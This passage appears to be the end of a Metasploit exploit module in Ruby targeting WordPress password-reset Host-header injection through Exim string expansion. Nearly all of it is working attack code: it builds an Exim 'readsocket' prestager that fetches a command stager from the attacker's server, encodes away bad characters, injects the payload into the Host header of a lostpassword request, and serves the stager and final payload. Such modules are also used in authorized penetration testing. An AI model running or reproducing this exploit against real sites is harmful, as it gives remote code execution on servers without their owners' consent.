:temp => datastore['WritableDir'],
:file => File.basename(cmdstager_path),
:nospace => true
).join(';')
print_status("Generating and sending Exim prestager")
generate_prestager.each do |command|
vprint_status("Sending #{command}")
send_request_payload(command)
end
end
#
# Exploit methods
#
# Absolute paths are required for prestager commands due to execve(2)
def generate_prestager
prestager = []
# This is basically sh -c `wget` implemented using Exim string expansions
# Badchars we can't encode away: \ for \n (newline) and : outside strings
prestager << '/bin/sh -c ${run{/bin/echo}{${extract{-1}{$value}' \
"{${readsocket{inet:#{srvhost_addr}:#{srvport}}" \
"{get #{get_resource} http/1.0$value$value}}}}}}"
# CmdStager should rm the file, but it blocks on the payload, so we do it
prestager << "/bin/rm -f #{cmdstager_path}"
end
def send_request_payload(command)
res = send_request_cgi(
'method' => 'POST',
'uri' => wordpress_url_login,
'headers' => {
'Host' => generate_exim_payload(command)
},
'vars_get' => {
'action' => 'lostpassword'
},
'vars_post' => {
'user_login' => datastore['USERNAME'],
'redirect_to' => '',
'wp-submit' => 'Get New Password'
}
)
if res && !res.redirect?
if res.code == 200 && res.body.include?('login_error')
fail_with(Failure::NoAccess, 'WordPress username may be incorrect')
elsif res.code == 400 && res.headers['Server'] =~ /^Apache/
fail_with(Failure::NotVulnerable, 'HttpProtocolOptions may be Strict')
else
fail_with(Failure::UnexpectedReply, "Server returned code #{res.code}")
end
end
res
end
def generate_exim_payload(command)
exim_payload = Rex::Text.rand_text_alpha(8)
exim_payload << "(#{Rex::Text.rand_text_alpha(8)} "
exim_payload << "-be ${run{#{encode_exim_payload(command)}}}"
exim_payload << " #{Rex::Text.rand_text_alpha(8)})"
end
# We can encode away the following badchars using string expansions
def encode_exim_payload(command)
command.gsub(/[\/ :]/,
'/' => '${substr{0}{1}{$spool_directory}}',
' ' => '${substr{10}{1}{$tod_log}}',
':' => '${substr{13}{1}{$tod_log}}'
)
end
#
# Utility methods
#
def cmdstager_flavor
datastore['CMDSTAGER::FLAVOR']
end
def cmdstager_path
@cmdstager_path ||=
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
end
#
# Override methods
#
# Return CmdStager on first request, payload on second
def on_request_uri(cli, request)
if @cmdstager
print_good("Sending #{@cmdstager}")
send_response(cli, @cmdstager)
@cmdstager = nil
else
print_good("Sending payload #{datastore['PAYLOAD']}")
super
end
end
end